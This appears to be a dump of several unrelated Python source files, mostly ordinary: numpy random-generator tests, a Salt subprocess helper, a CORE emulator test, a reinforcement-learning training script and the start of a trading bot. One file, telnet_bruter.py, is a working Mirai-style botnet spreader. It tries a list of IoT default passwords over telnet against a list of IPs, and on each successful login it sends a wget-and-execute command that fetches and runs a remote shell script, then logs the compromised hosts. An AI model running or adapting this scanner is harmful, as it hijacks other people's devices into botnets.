[-2.9534419690278444, 1.910964962531448],
[0.2719300361499433, 8.913100396613983]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_lognormal(self):
rnd.seed(self.seed, self.brng)
actual = rnd.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[81.92291750917155, 0.01795087229603931],
[0.1769118704670423, 3.415299544410577],
[1.2417099625339398, 102.0631392685238]])
np.testing.assert_array_almost_equal(actual, desired, decimal=6)
actual = rnd.lognormal(mean=.123456789, sigma=2.0, size=(3,2),
method='Box-Muller2')
desired = np.array([[0.2585388231094821, 0.43734953048924663],
[26.050836228611697, 26.76266237820882],
[0.24216420175675096, 0.2481945765083541]])
np.testing.assert_array_almost_equal(actual, desired, decimal=7)
def test_logseries(self):
rnd.seed(self.seed, self.brng)
actual = rnd.logseries(p=.923456789, size=(3, 2))
desired = np.array([[18, 1], [1, 1], [5, 19]])
np.testing.assert_array_equal(actual, desired)
def test_multinomial(self):
rs = rnd.RandomState(self.seed, brng=self.brng)
actual = rs.multinomial(20, [1/6.]*6, size=(3, 2))
desired = np.full((3, 2), 20, dtype=actual.dtype)
np.testing.assert_array_equal(actual.sum(axis=-1), desired)
expected = np.array([
[[6, 2, 1, 3, 2, 6], [7, 5, 1, 2, 3, 2]],
[[5, 1, 8, 3, 2, 1], [4, 6, 0, 4, 4, 2]],
[[6, 3, 1, 4, 4, 2], [3, 2, 4, 2, 1, 8]]], actual.dtype)
np.testing.assert_array_equal(actual, expected)
def test_multivariate_normal(self):
rnd.seed(self.seed, self.brng)
mean = (.123456789, 10)
# Hmm... not even symmetric.
cov = [[1, 0], [1, 0]]
size = (3, 2)
actual = rnd.multivariate_normal(mean, cov, size)
desired = np.array([[[-2.42282709811266, 10.0],
[1.2267795840027274, 10.0]],
[[0.06813924868067336, 10.0],
[1.001190462507746, 10.0]],
[[-1.74157261455869, 10.0],
[1.0400952859037553, 10.0]]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
# Check for default size, was raising deprecation warning
actual = rnd.multivariate_normal(mean, cov)
desired = np.array([1.0579899448949994, 10.0])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
# Check that non positive-semidefinite covariance raises warning
mean = [0, 0]
cov = [[1, 1 + 1e-10], [1 + 1e-10, 1]]
assert_warns(RuntimeWarning, rnd.multivariate_normal, mean, cov)
def test_multinormal_cholesky(self):
rnd.seed(self.seed, self.brng)
mean = (.123456789, 10)
# lower-triangular cholesky matrix
chol_mat = [[1, 0], [-0.5, 1]]
size = (3, 2)
actual = rnd.multinormal_cholesky(mean, chol_mat, size, method='ICDF')
desired = np.array([[[2.26461778189133, 6.857632824379853],
[-0.8043233941855025, 11.01629429884193]],
[[0.1699731103551746, 12.227809261928217],
[-0.6146263106001378, 9.893801873973892]],
[[1.691753328795276, 10.797627196240155],
[-0.647341237129921, 9.626899489691816]]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_negative_binomial(self):
rnd.seed(self.seed, self.brng)
actual = rnd.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[667, 679], [677, 676], [779, 648]])
np.testing.assert_array_equal(actual, desired)
def test_noncentral_chisquare(self):
rnd.seed(self.seed, self.brng)
actual = rnd.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[5.871334619375055, 8.756238913383225],
[17.29576535176833, 3.9028417087862177],
[5.1315133729432505, 9.942717979531027]])
np.testing.assert_array_almost_equal(actual, desired, decimal=7)
actual = rnd.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[0.0008971007339949436, 0.08948578998156566],
[0.6721835871997511, 2.8892645287699352],
[5.0858149962761007e-05, 1.7315797643658821]])
np.testing.assert_array_almost_equal(actual, desired, decimal=7)
def test_noncentral_f(self):
rnd.seed(self.seed, self.brng)
actual = rnd.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[0.2216297348371284, 0.7632696724492449],
[98.67664232828238, 0.9500319825372799],
[0.3489618249246971, 1.5035633972571092]])
np.testing.assert_array_almost_equal(actual, desired, decimal=7)
def test_normal(self):
rnd.seed(self.seed, self.brng)
actual = rnd.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[4.405778774782659, -4.020116569348963],
[-1.732103577371005, 1.2282652034983546],
[0.21648943171034918, 4.625591634211608]])
np.testing.assert_array_almost_equal(actual, desired, decimal=7)
rnd.seed(self.seed, self.brng)
actual = rnd.normal(loc=.123456789, scale=2.0, size=(3, 2), method="BoxMuller")
desired = np.array([[0.16673479781277187, -3.4809986872165952],
[-0.05193761082535492, 3.249201213154922],
[-0.11915582299214138, 3.555636100927892]])
np.testing.assert_array_almost_equal(actual, desired, decimal=8)
rnd.seed(self.seed, self.brng)
actual = rnd.normal(loc=.123456789, scale=2.0, size=(3, 2), method="BoxMuller2")
desired = np.array([[0.16673479781277187, 0.48153966449249175],
[-3.4809986872165952, -0.8101190082826486],
[-0.051937610825354905, 2.4088402362484342]])
np.testing.assert_array_almost_equal(actual, desired, decimal=7)
def test_pareto(self):
rnd.seed(self.seed, self.brng)
actual = rnd.pareto(a=.123456789, size=(3, 2))
desired = np.array(
[[0.14079174875385214, 82372044085468.92],
[1247881.6368437486, 15.086855668610944],
[203.2638558933401, 0.10445383654349749]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# http://mail.scipy.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
rnd.seed(self.seed, self.brng)
actual = rnd.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[1, 0], [0, 0], [0, 1]])
np.testing.assert_array_equal(actual, desired)
rnd.seed(self.seed, self.brng)
actual = rnd.poisson(lam=1234.56789, size=(3, 2))
desired = np.array([[1310, 1162], [1202, 1254], [1236, 1314]])
np.testing.assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('l').max
lamneg = -1
assert_raises(ValueError, rnd.poisson, lamneg)
assert_raises(ValueError, rnd.poisson, [lamneg]*10)
assert_raises(ValueError, rnd.poisson, lambig)
assert_raises(ValueError, rnd.poisson, [lambig]*10)
def test_power(self):
rnd.seed(self.seed, self.brng)
actual = rnd.power(a=.123456789, size=(3, 2))
desired = np.array([[0.8765841803224415, 1.2140041091640163e-14],
[8.013574117268635e-07, 0.06216255187464781],
[0.004895628723087296, 0.9054248959192386]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_rayleigh(self):
rnd.seed(self.seed, self.brng)
actual = rnd.rayleigh(scale=10, size=(3, 2))
desired = np.array([[1.80344345931194, 28.127692489122378],
[18.6169699930609, 8.282068232120208],
[11.460520015934597, 1.5662406536967712]])
np.testing.assert_array_almost_equal(actual, desired, decimal=7)
def test_standard_cauchy(self):
rnd.seed(self.seed, self.brng)
actual = rnd.standard_cauchy(size=(3, 2))
desired = np.array([[19.716487700629912, -16.608240276131227],
[-1.6117703817332278, 0.7739915895826882],
[0.058344614106131, 26.09825325697747]])
np.testing.assert_array_almost_equal(actual, desired, decimal=9)
def test_standard_exponential(self):
rnd.seed(self.seed, self.brng)
actual = rnd.standard_exponential(size=(3, 2))
desired = np.array([[0.016262041554675085, 3.955835423813157],
[1.7329578586126497, 0.3429632710074738],
[0.6567175951781875, 0.012265548926462446]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_standard_gamma(self):
rnd.seed(self.seed, self.brng)
actual = rnd.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[2.939330965027084, 2.799606052259993],
[4.988193705918075, 2.905305108691164],
[3.2630929395548147, 2.772756340265377]])
np.testing.assert_array_almost_equal(actual, desired, decimal=7)
def test_standard_normal(self):
rnd.seed(self.seed, self.brng)
actual = rnd.standard_normal(size=(3, 2))
desired = np.array([[2.1411609928913298, -2.071786679174482],
[-0.9277801831855025, 0.5524042072491773],
[0.04651632135517459, 2.2510674226058036]])
np.testing.assert_array_almost_equal(actual, desired, decimal=7)
rnd.seed(self.seed, self.brng)
actual = rnd.standard_normal(size=(3, 2), method='BoxMuller2')
desired = np.array([[0.021639004406385935, 0.17904143774624587],
[-1.8022277381082976, -0.4667878986413243],
[-0.08769719991267745, 1.1426917236242171]])
np.testing.assert_array_almost_equal(actual, desired, decimal=7)
def test_standard_t(self):
rnd.seed(self.seed, self.brng)
actual = rnd.standard_t(df=10, size=(3, 2))
desired = np.array([[-0.783927044239963, 0.04762883516531178],
[0.7624597987725193, -1.8045540288955506],
[-1.2657694296239195, 0.307870906117017]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_triangular(self):
rnd.seed(self.seed, self.brng)
actual = rnd.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[18.764540652669638, 6.340166306695037],
[8.827752689522429, 13.65605077739865],
[11.732872979633328, 18.970392754850423]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_uniform(self):
rnd.seed(self.seed, self.brng)
actual = rnd.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[10.38982478047721, 1.408218254214153],
[2.8756430713785814, 7.836974412682466],
[6.057706432128325, 10.426505200380925]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = rnd.uniform
np.testing.assert_raises(OverflowError, func, -np.inf, 0)
np.testing.assert_raises(OverflowError, func, 0, np.inf)
# this should not throw any error, since rng can be sampled as fmin*u + fmax*(1-u)
# for 0<u<1 and it stays completely in range
rnd.uniform(fmin, fmax)
# (fmax / 1e17) - fmin is within range, so this should not throw
rnd.uniform(low=fmin, high=fmax / 1e17)
def test_vonmises(self):
rnd.seed(self.seed, self.brng)
actual = rnd.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[1.1027657269593822, 1.2539311427727782],
[2.0281801137277764, 1.3262040229028056],
[0.9510301598100863, 2.0284972823322818]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_vonmises_small(self):
# check infinite loop, gh-4720
rnd.seed(self.seed, self.brng)
r = rnd.vonmises(mu=0., kappa=1.1e-8, size=10**6)
np.testing.assert_(np.isfinite(r).all())
def test_wald(self):
rnd.seed(self.seed, self.brng)
actual = rnd.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[0.3465678392232347, 0.3594497155916536],
[2.192908727996422, 1.7408141717513501],
[1.1943709105062374, 0.3273455943060196]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_weibull(self):
rnd.seed(self.seed, self.brng)
actual = rnd.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.035129404330214734, 3.058859465984936],
[1.5636393343788513, 0.4189406773709585],
[0.710439924774508, 0.02793103204502023]])
np.testing.assert_array_almost_equal(actual, desired, decimal=10)
def test_zipf(self):
rnd.seed(self.seed, self.brng)
actual = rnd.zipf(a=1.23, size=(3, 2))
desired = np.array([[62062919, 1], [24, 209712763], [2, 24]])
np.testing.assert_array_equal(actual, desired)
class TestThread_Intel(object):
# make sure each state produces the same sequence even in threads
def setUp(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(rnd.RandomState(s), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(rnd.RandomState(s), o)
# these platforms change x87 fpu precision mode in threads
if (np.intp().dtype.itemsize == 4 and sys.platform == "win32"):
np.testing.assert_array_almost_equal(out1, out2)
else:
np.testing.assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1/6.]*6, size=10000)
self.check_function(gen_random, sz=(10000,6))
if __name__ == "__main__":
run_module_suite()
|
timed_subprocess.py
|
# -*- coding: utf-8 -*-
'''
For running command line executables with a timeout
'''
from __future__ import absolute_import, print_function, unicode_literals
import shlex
import subprocess
import threading
import salt.exceptions
import salt.utils.data
from salt.ext import six
class TimedProc(object):
'''
Create a TimedProc object, calls subprocess.Popen with passed args and **kwargs
'''
def __init__(self, args, **kwargs):
self.wait = not kwargs.pop('bg', False)
self.stdin = kwargs.pop('stdin', None)
self.with_communicate = kwargs.pop('with_communicate', self.wait)
self.timeout = kwargs.pop('timeout', None)
self.stdin_raw_newlines = kwargs.pop('stdin_raw_newlines', False)
# If you're not willing to wait for the process
# you can't define any stdin, stdout or stderr
if not self.wait:
self.stdin = kwargs['stdin'] = None
self.with_communicate = False
elif self.stdin is not None:
if not self.stdin_raw_newlines:
# Translate a newline submitted as '\n' on the CLI to an actual
# newline character.
self.stdin = salt.utils.stringutils.to_bytes(self.stdin.replace('\\n', '\n'))
kwargs['stdin'] = subprocess.PIPE
if not self.with_communicate:
self.stdout = kwargs['stdout'] = None
self.stderr = kwargs['stderr'] = None
if self.timeout and not isinstance(self.timeout, (int, float)):
raise salt.exceptions.TimedProcTimeoutError('Error: timeout {0} must be a number'.format(self.timeout))
try:
self.process = subprocess.Popen(args, **kwargs)
except (AttributeError, TypeError):
if not kwargs.get('shell', False):
if not isinstance(args, (list, tuple)):
try:
args = shlex.split(args)
except AttributeError:
args = shlex.split(six.text_type(args))
str_args = []
for arg in args:
if not isinstance(arg, six.string_types):
str_args.append(six.text_type(arg))
else:
str_args.append(arg)
args = str_args
else:
if not isinstance(args, (list, tuple, six.string_types)):
# Handle corner case where someone does a 'cmd.run 3'
args = six.text_type(args)
# Ensure that environment variables are strings
for key, val in six.iteritems(kwargs.get('env', {})):
if not isinstance(val, six.string_types):
kwargs['env'][key] = six.text_type(val)
if not isinstance(key, six.string_types):
kwargs['env'][six.text_type(key)] = kwargs['env'].pop(key)
if six.PY2 and 'env' in kwargs:
# Ensure no unicode in custom env dict, as it can cause
# problems with subprocess.
kwargs['env'] = salt.utils.data.encode_dict(kwargs['env'])
args = salt.utils.data.decode(args)
self.process = subprocess.Popen(args, **kwargs)
self.command = args
def run(self):
'''
wait for subprocess to terminate and return subprocess' return code.
If timeout is reached, throw TimedProcTimeoutError
'''
def receive():
if self.with_communicate:
self.stdout, self.stderr = self.process.communicate(input=self.stdin)
elif self.wait:
self.process.wait()
if not self.timeout:
receive()
else:
rt = threading.Thread(target=receive)
rt.start()
rt.join(self.timeout)
if rt.isAlive():
# Subprocess cleanup (best effort)
self.process.kill()
def terminate():
if rt.isAlive():
self.process.terminate()
threading.Timer(10, terminate).start()
raise salt.exceptions.TimedProcTimeoutError(
'{0} : Timed out after {1} seconds'.format(
self.command,
six.text_type(self.timeout),
)
)
return self.process.returncode
|
telnet_bruter.py
|
#!/usr/bin/python
import threading
import sys, os, re, time, socket
from Queue import *
from sys import stdout
if len(sys.argv) < 4:
print "Usage: python "+sys.argv[0]+" <list> <threads> <output file>"
sys.exit()
combo = [
"root:root",
"root:",
"admin:admin",
"support:support",
"user:user",
"admin:",
"admin:password",
"root:vizxv",
"root:admin",
"root:xc3511",
"root:888888",
"root:xmhdipc",
"root:default",
"root:juantech",
"root:123456",
"root:54321",
"root:12345",
"root:pass",
"ubnt:ubnt",
"root:klv1234",
"root:Zte521",
"root:hi3518",
"root:jvbzd",
"root:anko",
"root:zlxx.",
"root:7ujMko0vizxv",
"root:7ujMko0admin",
"root:system",
"root:ikwb",
"root:dreambox",
"root:user",
"root:realtek",
"root:00000000",
"admin:1111111",
"admin:1234",
"admin:12345",
"admin:54321",
"admin:123456",
"admin:7ujMko0admin",
"admin:1234",
"admin:pass",
"admin:meinsm",
"admin:admin1234",
"root:1111",
"admin:smcadmin",
"admin:1111",
"root:666666",
"root:password",
"root:1234",
"root:klv123",
"Administrator:admin",
"service:service",
"supervisor:supervisor",
"guest:guest",
"guest:12345",
"guest:12345",
"admin1:password",
"administrator:1234",
"666666:666666",
"888888:888888",
"tech:tech",
"mother:fucker"
]
ips = open(sys.argv[1], "r").readlines()
threads = int(sys.argv[2])
output_file = sys.argv[3]
queue = Queue()
queue_count = 0
for ip in ips:
queue_count += 1
stdout.write("\r[%d] Added to queue" % queue_count)
stdout.flush()
queue.put(ip)
print "\n"
class router(threading.Thread):
def __init__ (self, ip):
threading.Thread.__init__(self)
self.ip = str(ip).rstrip('\n')
self.rekdevice="cd /tmp; wget http://0.0.0.0/update.sh; busybox wget http://0.0.0.0/update.sh; chmod 777 update.sh; sh update.sh; rm -f update.sh" #command to send
def run(self):
global fh
username = ""
password = ""
for passwd in combo:
if ":n/a" in passwd:
password=""
else:
password=passwd.split(":")[1]
if "n/a:" in passwd:
username=""
else:
username=passwd.split(":")[0]
try:
tn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tn.settimeout(0.37)
tn.connect((self.ip,23))
except Exception:
tn.close()
break
try:
hoho = ''
hoho += readUntil(tn, ":")
if ":" in hoho:
tn.send(username + "\r\n")
time.sleep(0.1)
except Exception:
tn.close()
try:
hoho = ''
hoho += readUntil(tn, ":")
if ":" in hoho:
tn.send(password + "\r\n")
time.sleep(0.1)
else:
pass
except Exception:
tn.close()
try:
prompt = ''
prompt += tn.recv(40960)
if "#" in prompt or "$":
success = True
else:
tn.close()
if success == True:
try:
tn.send(self.rekdevice + "\r\n")
fh.write(self.ip + ":23 " + username + ":" + password + "\n") # 1.1.1.1:23 user:pass # mirai
fh.flush()
print "[+] GOTCHA -> %s:%s:%s"%(username, password, self.ip)
tn.close()
break
except:
tn.close()
else:
tn.close()
except Exception:
tn.close()
def readUntil(tn, string, timeout=8):
buf = ''
start_time = time.time()
while time.time() - start_time < timeout:
buf += tn.recv(1024)
time.sleep(0.01)
if string in buf: return buf
raise Exception('TIMEOUT!')
def worker():
try:
while True:
try:
IP = queue.get()
thread = router(IP)
thread.start()
queue.task_done()
time.sleep(0.02)
except:
pass
except:
pass
global fh
fh = open("workingtelnet.txt","a")
for l in xrange(threads):
try:
t = threading.Thread(target=worker)
t.start()
except:
pass
|
test_gui.py
|
"""
Unit tests for testing with a CORE switch.
"""
import threading
from core.api.tlv import coreapi, dataconversion
from core.api.tlv.coreapi import CoreExecuteTlv
from core.emulator.enumerations import CORE_API_PORT, NodeTypes
from core.emulator.enumerations import EventTlvs
from core.emulator.enumerations import EventTypes
from core.emulator.enumerations import ExecuteTlvs
from core.emulator.enumerations import LinkTlvs
from core.emulator.enumerations import LinkTypes
from core.emulator.enumerations import MessageFlags
from core.emulator.enumerations import MessageTypes
from core.nodes import ipaddress
def command_message(node, command):
"""
Create an execute command TLV message.
:param node: node to execute command for
:param command: command to execute
:return: packed execute message
"""
tlv_data = CoreExecuteTlv.pack(ExecuteTlvs.NODE.value, node.id)
tlv_data += CoreExecuteTlv.pack(ExecuteTlvs.NUMBER.value, 1)
tlv_data += CoreExecuteTlv.pack(ExecuteTlvs.COMMAND.value, command)
return coreapi.CoreExecMessage.pack(MessageFlags.STRING.value | MessageFlags.TEXT.value, tlv_data)
def state_message(state):
"""
Create a event TLV message for a new state.
:param core.enumerations.EventTypes state: state to create message for
:return: packed event message
"""
tlv_data = coreapi.CoreEventTlv.pack(EventTlvs.TYPE.value, state.value)
return coreapi.CoreEventMessage.pack(0, tlv_data)
def switch_link_message(switch, node, address, prefix_len):
"""
Create a link TLV message for node to a switch, with the provided address and prefix length.
:param switch: switch for link
:param node: node for link
:param address: address node on link
:param prefix_len: prefix length of address
:return: packed link message
"""
tlv_data = coreapi.CoreLinkTlv.pack(LinkTlvs.N1_NUMBER.value, switch.id)
tlv_data += coreapi.CoreLinkTlv.pack(LinkTlvs.N2_NUMBER.value, node.id)
tlv_data += coreapi.CoreLinkTlv.pack(LinkTlvs.TYPE.value, LinkTypes.WIRED.value)
tlv_data += coreapi.CoreLinkTlv.pack(LinkTlvs.INTERFACE2_NUMBER.value, 0)
tlv_data += coreapi.CoreLinkTlv.pack(LinkTlvs.INTERFACE2_IP4.value, address)
tlv_data += coreapi.CoreLinkTlv.pack(LinkTlvs.INTERFACE2_IP4_MASK.value, prefix_len)
return coreapi.CoreLinkMessage.pack(MessageFlags.ADD.value, tlv_data)
def run_cmd(node, exec_cmd):
"""
Convenience method for sending commands to a node using the legacy API.
:param node: The node the command should be issued too
:param exec_cmd: A string with the command to be run
:return: Returns the result of the command
"""
# Set up the command api message
# tlv_data = CoreExecuteTlv.pack(ExecuteTlvs.NODE.value, node.id)
# tlv_data += CoreExecuteTlv.pack(ExecuteTlvs.NUMBER.value, 1)
# tlv_data += CoreExecuteTlv.pack(ExecuteTlvs.COMMAND.value, exec_cmd)
# message = coreapi.CoreExecMessage.pack(MessageFlags.STRING.value | MessageFlags.TEXT.value, tlv_data)
message = command_message(node, exec_cmd)
node.session.broker.handlerawmsg(message)
# Now wait for the response
server = node.session.broker.servers["localhost"]
server.sock.settimeout(50.0)
# receive messages until we get our execute response
result = None
status = False
while True:
message_header = server.sock.recv(coreapi.CoreMessage.header_len)
message_type, message_flags, message_length = coreapi.CoreMessage.unpack_header(message_header)
message_data = server.sock.recv(message_length)
# If we get the right response return the results
print("received response message: %s" % message_type)
if message_type == MessageTypes.EXECUTE.value:
message = coreapi.CoreExecMessage(message_flags, message_header, message_data)
result = message.get_tlv(ExecuteTlvs.RESULT.value)
status = message.get_tlv(ExecuteTlvs.STATUS.value)
break
return result, status
class TestGui:
def test_broker(self, cored):
"""
Test session broker creation.
:param core.emulator.coreemu.EmuSession session: session for test
:param cored: cored daemon server to test with
"""
# set core daemon to run in the background
thread = threading.Thread(target=cored.server.serve_forever)
thread.daemon = True
thread.start()
# ip prefix for nodes
prefix = ipaddress.Ipv4Prefix("10.83.0.0/16")
daemon = "localhost"
# add server
session = cored.server.coreemu.create_session()
session.broker.addserver(daemon, "127.0.0.1", CORE_API_PORT)
# setup server
session.broker.setupserver(daemon)
# do not want the recvloop running as we will deal ourselves
session.broker.dorecvloop = False
# have broker handle a configuration state change
session.set_state(EventTypes.CONFIGURATION_STATE)
event_message = state_message(EventTypes.CONFIGURATION_STATE)
session.broker.handlerawmsg(event_message)
# create a switch node
switch = session.add_node(_type=NodeTypes.SWITCH)
switch.setposition(x=80, y=50)
switch.server = daemon
# retrieve switch data representation, create a switch message for broker to handle
switch_data = switch.data(MessageFlags.ADD.value)
switch_message = dataconversion.convert_node(switch_data)
session.broker.handlerawmsg(switch_message)
# create node one
node_one = session.add_node()
node_one.server = daemon
# create node two
node_two = session.add_node()
node_two.server = daemon
# create node messages for the broker to handle
for node in [node_one, node_two]:
node_data = node.data(MessageFlags.ADD.value)
node_message = dataconversion.convert_node(node_data)
session.broker.handlerawmsg(node_message)
# create links to switch from nodes for broker to handle
for index, node in enumerate([node_one, node_two], start=1):
ip4_address = prefix.addr(index)
link_message = switch_link_message(switch, node, ip4_address, prefix.prefixlen)
session.broker.handlerawmsg(link_message)
# change session to instantiation state
event_message = state_message(EventTypes.INSTANTIATION_STATE)
session.broker.handlerawmsg(event_message)
# Get the ip or last node and ping it from the first
output, status = run_cmd(node_one, "ip -4 -o addr show dev eth0")
pingip = output.split()[3].split("/")[0]
output, status = run_cmd(node_two, "ping -c 5 " + pingip)
assert not status
|
test.py
|
# -*- coding: utf-8 -*-
import time
import threading
import urllib.request, urllib.parse
from datetime import datetime
def schedule():
addr = "1a:2b:3c:46:2b:3c 1a:2b:3c:46:2b:3c 1a:2b:3c:4e:5f:6g"
print("post")
data = {}
data["addr"] = addr
url = "http://127.0.0.1:5000"
try:
data = urllib.parse.urlencode(data).encode("utf-8")
req = urllib.request.Request(url, data=data, method="POST")
with urllib.request.urlopen(req) as res:
res = res.read().decode("utf-8")
print(res)
except:
print('Error')
addr2 = "1a:2b:3c:46:2b:3c"
print("post")
data = {}
data["addr2"] = addr2
url = "http://127.0.0.1:5000/2"
try:
data = urllib.parse.urlencode(data).encode("utf-8")
req = urllib.request.Request(url, data=data, method="POST")
with urllib.request.urlopen(req) as res:
res = res.read().decode("utf-8")
print(res)
except:
print('Error')
addr3 = "1a:2b:3c:46:2b:3c"
print("post")
data = {}
data["addr3"] = addr3
url = "http://127.0.0.1:5000/3"
try:
data = urllib.parse.urlencode(data).encode("utf-8")
req = urllib.request.Request(url, data=data, method="POST")
with urllib.request.urlopen(req) as res:
res = res.read().decode("utf-8")
print(res)
except urllib.error.HTTPError as err:
print(err.reason)
def scheduler(interval, f, wait = True):
base_time = time.time()
next_time = 0
while True:
t = threading.Thread(target = f)
t.start()
if wait:
t.join()
next_time = ((base_time - time.time()) % interval) or interval
time.sleep(next_time)
if __name__ == "__main__":
scheduler(3, schedule, True)
|
solve_hopper_sb3_sac_cnn.py
|
#!/usr/bin/env python3
import time
import tqdm
import shutil
import datetime
import os.path
import torch as th
import os
from pyvirtualdisplay import Display
import inspect
from typing import Optional, Union, List, Tuple, Dict, Type, Any
import argparse
import csv
from multiprocessing import Process
from stable_baselines3.ppo import CnnPolicy
from stable_baselines3.ppo import PPO
from stable_baselines3.sac import SAC
import stable_baselines3
import torch.nn as nn
import gym
from stable_baselines3.common.callbacks import CheckpointCallback
import autoencoding_rl
import lr_gym
import lr_gym.utils.dbg.ggLog as ggLog
from lr_gym.envs.HopperVisualEnv import HopperVisualEnv
from lr_gym.envs.GymEnvWrapper import GymEnvWrapper
from lr_gym.envControllers.GazeboController import GazeboController
from lr_gym.envs.RecorderGymWrapper import RecorderGymWrapper
from autoencoding_rl.DeeperCNNPolicy import DeeperCnnPolicySAC
def main(envsNum : int, fileToLoad=None, run_id_prefix : str = "",seed=0) -> None:
"""
"""
logFolder = lr_gym.utils.utils.lr_gym_startup(__file__, inspect.currentframe(),run_id_prefix=run_id_prefix)
img_height = 64
img_width = 64
trainSteps = 10000000
targetFps = 50
stepLength_sec = (1/targetFps)/3 #Frame stacking reduces by 3 the fps
def constructEnv(i):
env = GymEnvWrapper(HopperVisualEnv( startSimulation = True,
simulatorController = GazeboController(stepLength_sec = stepLength_sec),
stepLength_sec = stepLength_sec,
obs_img_height_width = (img_height,img_width),
imgEncoding = "int"),
episodeInfoLogFile = logFolder+"/GymEnvWrapper_log."+str(i)+".csv")
return env
env = stable_baselines3.common.vec_env.SubprocVecEnv([lambda i=i: constructEnv(i) for i in range(envsNum)])
#setup seeds for reproducibility
RANDOM_SEED=seed
env.seed(RANDOM_SEED)
env.action_space.seed(RANDOM_SEED)
env._max_episode_steps = 500 #limit episode length
device = "cuda"
print("Built environment, will now start...")
time.sleep(5)
if fileToLoad is None:
model = SAC(DeeperCnnPolicySAC, env, verbose=1,
batch_size=256,
buffer_size=50000,
gamma=0.98,
tau=0.02,
learning_rate=0.00073,
learning_starts=1000,
policy_kwargs={"log_std_init":-2, "net_arch":[64,64]},
use_sde_at_warmup=True,
use_sde=True,
seed = seed,
device = device,
train_freq=(1,"episode"),
gradient_steps=60)
ggLog.info("Learning...")
t_preLearn = time.time()
model.learn(total_timesteps=trainSteps)
duration_learn = time.time() - t_preLearn
ggLog.info("Learned. Took "+str(duration_learn)+" seconds.")
model.save(logFolder+"/trained_model_trainSteps.zip")
else:
model = SAC.load(fileToLoad)
ggLog.info("Loaded pre-trained model "+fileToLoad)
ggLog.info("Evaluating policy...")
t_preVal = time.time()
trainedSteps = model.num_timesteps
eval_results = lr_gym.utils.utils.evaluatePolicy(env, model, 100)
eval_results["env_steps"] = trainedSteps
ggLog.info("Evaluated policy:")
for prop in eval_results:
print(f" {prop} : {eval_results[prop]}")
env.close()
return eval_results
if __name__ == "__main__":
ap = argparse.ArgumentParser()
ap.add_argument("--envsNum", required=False, default=1, type=int, help="Number of environments to run in parallel")
ap.add_argument("--load", default=None, type=str, help="load this model instead of performing the training")
ap.add_argument("--seed", default=0, type=int, help="Random seed to use")
ap.add_argument("--xvfb", default=False, action='store_true', help="Run with xvfb")
ap.set_defaults(feature=True)
args = vars(ap.parse_args())
if args["xvfb"]:
disp = Display()
disp.start()
if args["load"] is not None:
with open("eval_"+datetime.datetime.now().strftime('%Y%m%d-%H%M%S')+".csv","w") as csvfile:
csvwriter = csv.writer(csvfile, delimiter = ",")
neverWroteToCsv = True
filesToLoad = lr_gym.utils.utils.fileGlobToList(args["load"])
for file in filesToLoad:
print("Will now evaluate model "+file+"...")
eval_results = {}
#time.sleep(10)
def func(file): #Do in subprocess to avoid isues with ros initilization
eval_results = main(fileToLoad=file, run_id_prefix="eval_", envsNum = args["envsNum"], seed = args["seed"])
p = Process(target=func, args=(file,))
p.start()
p.join()
eval_results["file"] = file
if neverWroteToCsv:
csvwriter.writerow(eval_results.keys())
csvwriter.writerow(eval_results.values())
csvfile.flush()
else:
main(envsNum = args["envsNum"])
if args["xvfb"]:
disp.stop()
|
arb2.py
|
# general default options
from config import *
# Basic objects
from Balance import *
from Pair import *
from Trades import *
# The individual markets and handling of them
from poloniex import *
from gdax import *
# Our gui
from window import *
# trading algo api
from vanilla import *
import threading
import json
import time
import curses
import copy
import logging
logger = logging.getLogger(__name__)
hdlr = logging.FileHandler('logs/logger.log')
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s',datefmt='%s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(logging.WARNING)
class Book(object):
def __init__(self,m,numCur):
# numCur is the amount of currencies we are
# going to be tracking across all the exchanges
# eg, ltc/btc, ftc/btc would be 2 etc.
# keep track of running time
